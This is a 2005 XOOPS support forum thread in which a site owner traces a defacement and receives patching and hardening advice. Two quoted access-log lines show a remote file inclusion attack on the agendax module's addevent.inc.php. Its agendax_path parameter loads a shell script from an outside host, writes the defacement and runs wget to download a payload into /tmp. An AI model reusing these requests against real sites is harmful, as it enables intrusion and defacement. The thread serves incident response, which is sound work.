XOOPS 
Forum
Forum Index General Forums Community Support Modules Support Themes Support Development International Support Module Hack Reviews Theme Designer Talk
  1. Board index / 
  2. XOOPS Community Support forums / 
  3. Q and A 
  4.  / Hacked, where in Xoops did they gain entry???
Register
1
phaelon
Hacked, where in Xoops did they gain entry???

  • 2005/4/7 5:52

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


I have a site running XOOPS 2.73, which I was planning to update to 2.9 this weekend. It was hacked in the following manner.

In the default HTML folder a index.html file was placed stating "KbyTe WaS heRe [www.kbyte.tk]"

Are there any log files that will point me in the right direction to tracking how they hacked through Xoops? The password for the hosting company is 10 characters long and is a randomly generated password consisting of complex variables. Basically I know the hosting company's side was not hacked, which leaves only XOOPS left.

I know PHPnuke is very vulnerable to exploits, and doing some research I came across information that states they are clan that hack Nuke sites.
Here is the information I found doing a few searches on their clan.
Quote:

You are a part of the mass deface against sites with nuke
For information to visit www.kbyte.tk
To contact myself write to k3kbyte@gmail.com
Dedicated specially to coty and the members of Olimpus Klan and Icenetx Hack Team:
0o_Zyr Golden_o0
0o_Zeus_o0
0o_Adi_o0
0o_Yes_o0
0o_Rey_o0
0o_Snake_o0
0o_Dreamer_o0
0o_Neubius_o0
Gaper
Trew
Brio
Fieldy
Ralf
Cero


Are the same vulnerabilities that exist in Nuke present in xoops?

Any ideas on how I can find where they came in from?
2
brash
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/7 6:00

  • brash

  • Friend of XOOPS

  • Posts: 2206

  • Since: 2003/4/10


Sounds more like a webserver exploit or configuration issue to me. If you've setup you permissions as per the XOOPS instructions then the server should not be able to physically write to your XOOPS root directory. The only directories in XOOPS that should be write enabled for XOOPS are the cache, template_c and upload directories.

If you have access to your webserver log files, I would be trying to narrow down the window of time when this happened and look for any entries using the POST method. Might also be a good idea to also double check your permissions and install the XOOPS protector module.
3
m0nty
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/7 6:02

  • m0nty

  • XOOPS is my life!

  • Posts: 3337

  • Since: 2003/10/24


xoops is more secure than nuke..

from what u say in regard to index.html being changed.. they didn't hack your site via xoops..

it sounds like it was the server that was hacked or maybe another site which is hosted on the same server as yours.. possibly via a phpbb forum that was unpatched, or maybe awstats that was unpatched or as they say a nuke site on the same server.. your host company should be able to trace this.. it could be other things tho, if u check your servers logfiles and look for anything suspicious in the logs...

to be even safer, you should install the protector module if you haven't already..
4
phaelon
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/7 13:45

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


Yeap, I shouldn't have pointed the finger at Xoops. Looking through what little logs are available to me it's evident that it was the web server itself which was compromised.

A question about the protector module. In the security advisory part it says you disable global registers in the .htaccess file under your www root, however once I did that I got a 500 forbidden error when trying to open the page. Any ideas?
5
ackbarr
Re: Hacked, where in Xoops did they gain entry???

the 500 error can occur if there is a formatting error in your .htaccess file.

1. rename the .htaccess file to anything else, see if the site starts working again
2. make sure the format of your directive is correct:
php_flag register_globals 0
6
phaelon
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/7 19:22

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


Looking through my Raw access logs I found this. So it basically looks like he gained access through the agenda Module.

201.255.96.220 - - [06/Apr/2005:19:56:02 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=echo%20KbyTe%20WaS%20heRe%20[www.kbyte.tk]>../../index.html HTTP/1.1" 200 1848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"


The module in question has been shut down. Nifty way of hacking it thought don't you agree?
7
DonXoop
Re: Hacked, where in Xoops did they gain entry???

That's an old security bug of agendax. Was fixed quite a while ago. Several things to do, update Agendax, turn register_globals off as mentioned, prevent any direct attempts to load addevent.inc.php (via .htaccess). And always check the devel sites of XOOPS and 3rd party modules that you use, before there is a problem.

Good idea to make a practice of running server log analysis. You'll be surprised when you discover daily attempts at site cracking.

Technically speaking they didn't come through xoops. They used an exploit in the addevent.inc.php file to make a direct call to PHP. XOOPS was completely bypassed.

edit-> simply disabling that module won't solve your problem. You should upgrade, rename, or delete the directory. A cracker can still make a call to that file and do it all over again.
8
phaelon
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/7 20:29

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


Yeah, that's kind of what I was trying to hint at as far as XOOPS being bypassed. This module was re-enabled to be used for keeping track of raids, and I saw the version but I assumed the updates I did a few months ago from 2.0 to 2.7 fixed it. Note to the wise to never assume.

I disabled, uninstalled the module and then deleted the agendaX directory within a minute of seeing that GET statement. So it's cool from that standpoint. I'll install the newest calendar tonight.

Thanks for all your help guys, and sorry I lost faith and blamed xoops, it must be the horror days from PHPnuke that pushed me towards blaming the engine.

Two things, first everytime I add that command to the .htaccess file I get the 500 error. It's the only thing in the file too so I don't know what's going on with that.
Second, you mentioned server log analysis. Does XOOPS do this or do you mean through the Protect module? I look at the hosting logs about 1 time a week as is.
9
brash
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/8 0:22

  • brash

  • Friend of XOOPS

  • Posts: 2206

  • Since: 2003/4/10


It's understandable to assume XOOPS strraight off the bat when your website is running it. As long as you have the Protector module properly installed you *should* be pretty safe against any XOOPS expliots (although there aren't a huge amount of them anyway). I reckon I've got a dozen or so reported attack attempts from Protector that were no doubt being attempted before I used it as well. Assuming that the IP address in your logs is not spoofed, then it looks like the attack came from Argentina.

http://www.dnsstuff.com/tools/whois.ch?ip=201.255.96.220

As for log analysis, XOOPS will not do this for you. AWStats is propbably your best freeware option if your host does not provide anything themselves.
10
phaelon
Re: Hacked, where in Xoops did they gain entry???

  • 2005/4/8 5:30

  • phaelon

  • Just popping in

  • Posts: 35

  • Since: 2004/8/23


Thanks for all the help. Any idea what he did with the following GET command? He executed wget so he was trying to webget something and download it into the directoy, but I can't tell if it failed or not. He/she Ran this same command 3 times. I also searched for any files named r0nin and any connections in those folders and found nothing.

201.255.96.220 - - [06/Apr/2005:20:00:03 -0700] "GET /modules/agendax/addevent.inc.php?agendax_path=http://kbyte.gratishost.com/sh.py?&cmd=cd%20/tmp%20wget%20http://users.cjb.net/kbyt3/r0nin HTTP/1.1" 200 1841 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Thanks,
andy

Login

Register now!  |  Lost Password?

Search

Advanced Search

Recent Posts

Who's Online

200 user(s) are online (106 user(s) are browsing Support Forums)

Members: 0

Guests: 200

more...

Donat-O-Meter

Stats
Goal: $100.00
Due Date: May 31
Gross Amount: $0.00
Net Balance: $0.00
Left to go: $100.00
Make donations with PayPal!

Latest GitHub Commits